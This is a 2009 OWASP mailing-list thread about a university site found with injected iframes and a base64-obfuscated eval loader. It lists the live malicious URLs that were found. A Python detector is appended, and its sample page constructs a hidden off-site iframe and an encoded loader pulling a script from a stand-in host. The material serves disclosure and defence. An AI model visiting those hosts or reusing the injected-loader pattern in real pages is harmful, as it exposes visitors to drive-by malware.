[OWASP-Bangalore] OWASP-Bangalore Digest, Vol 23, Issue 2

Abhay Bhargav abhaybhargav at gmail.com
Wed Oct 7 23:04:00 EDT 2009


This is not very surprising. I have found several XSS vulnerabilities with
some very reputed universities and B-schools across the country (I shall not
name them). I have sent several mails to them and reported the issue, but it
is obviously not of high priority for them. I believe that, in some cases,
they don't know how to fix the problem also.

This phenomenon of embedded and obfuscated JavaScript is common to the
Nine-ball and Gumblar worms. You might want to report this problem in such a
light.

Regards
Abhay

On Wed, Oct 7, 2009 at 9:44 PM, Sajin Jose <sajinkokkad at gmail.com> wrote:

> Unbelievable !! Just wondering why no one there at the university noticed
> this and rectified it..
> Also, I would really appreciate it if someone could explain how the malicious
> site did this on a seemingly reputed university's site.. Any inputs?
>
> Rgds,
> Sajin.
>
> On Wed, Oct 7, 2009 at 9:30 PM, <owasp-bangalore-request at lists.owasp.org> wrote:
>
>> Message: 1
>> Date: Tue, 6 Oct 2009 23:51:14 +0530
>> From: "praveen_recker ." <praveen_recker at sify.com>
>> Subject: [OWASP-Bangalore] iframes injected into premiere educational institutes site
>> To: owasp-bangalore at lists.owasp.org, owasp-delhi at lists.owasp.org
>>
>> Hi OWASP,
>>
>> I am writing this such that it can be passed on to the concerned authorities.
>> I tried to find a mail id of the respective institute to inform them but
>> couldn't find any.
>>
>> Details are as follows....
>> Visit any page on http://www.nagarjunauniversity.ac.in
>> and right-click to "View Source"; we'll find the following site embedded in an
>> iframe: http://bale.ws/show.php
>> When we open the above site it gets redirected to
>> http://superpupermegacasino.com/ which hosts SmartDownload.exe
>>
>> Details of the EXE at VirusTotal are shown as Win32/CasOnline!Adware
>>
>> http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534
>>
>>
>> The page has eval() and base64_decode() methods. When we decode the base64
>> content, the site esli.tw is embedded.
>>
>> There is one more site embedded: http://b.nt002.cn/E/J.JS
>>
>> When we visit a few pages on this site, and if any AV is installed on your
>> machine (McAfee AntiVirus is installed in my case and triggers a PDF-Exploit
>> alert), it should trigger some alert.
>>
>> Interested folks can further analyze. Please inform concerned guys from
>> Nagarjuna University.
>>
>> Best Regards,
>> Praveen Darshanam,
>> Security Researcher


-- 
Linkedin -  http://www.linkedin.com/in/abhaybhargav

My Security Blog - http://citadelnotes.blogspot.com

Blog feeds - http://feeds2.feedburner.com/AbhayBhargavOnInformationSecurity
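A defender-side check for the two patterns Praveen's report describes (an iframe pointing off-site, and an eval(base64_decode("...")) loader whose decoded payload names further hosts), added here as an example and not code from anyone in the thread. The sample page and every hostname in it are constructed placeholders, not the live indicators quoted above.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page with hypothetical hosts (not the thread's live indicators): a hidden
# off-site iframe plus an eval(base64_decode("...")) loader that pulls in a further script.
LOADER_JS = 'document.write(\'<script src="http://loader.example/E/J.JS"></script>\');'
LOADER_B64 = base64.b64encode(LOADER_JS.encode()).decode()
SAMPLE_HTML = f"""<html><body><h1>University home</h1>
<iframe src="http://bad-host.example/show.php" width="0" height="0"></iframe>
<iframe src="/news/index.html"></iframe>
<script>eval(base64_decode("{LOADER_B64}"));</script>
</body></html>"""

class IframeCollector(HTMLParser):
    """Collect the src attribute of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

EVAL_B64 = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]""")
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

def offsite_iframes(html, site_host):
    """Return iframe src values whose host differs from the site's own (relative src counts as on-site)."""
    parser = IframeCollector()
    parser.feed(html)
    return [s for s in parser.srcs
            if (urlparse(s).hostname or site_host).lower() != site_host.lower()]

def decoded_loader_hosts(html):
    """Decode each eval(base64_decode("...")) blob and list the hosts its payload references."""
    hosts = []
    for blob in EVAL_B64.findall(html):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error subclasses ValueError: skip junk, don't crash
            continue
        hosts.extend(h.lower() for h in HOST.findall(text))
    return hosts

if __name__ == "__main__":
    print("off-site iframes:", offsite_iframes(SAMPLE_HTML, "www.university.example"))
    print("hosts in decoded loaders:", decoded_loader_hosts(SAMPLE_HTML))
```

Run it against a saved copy of a page you administer; any off-site iframe or decoded loader host you do not recognise is what to hand to the site owner.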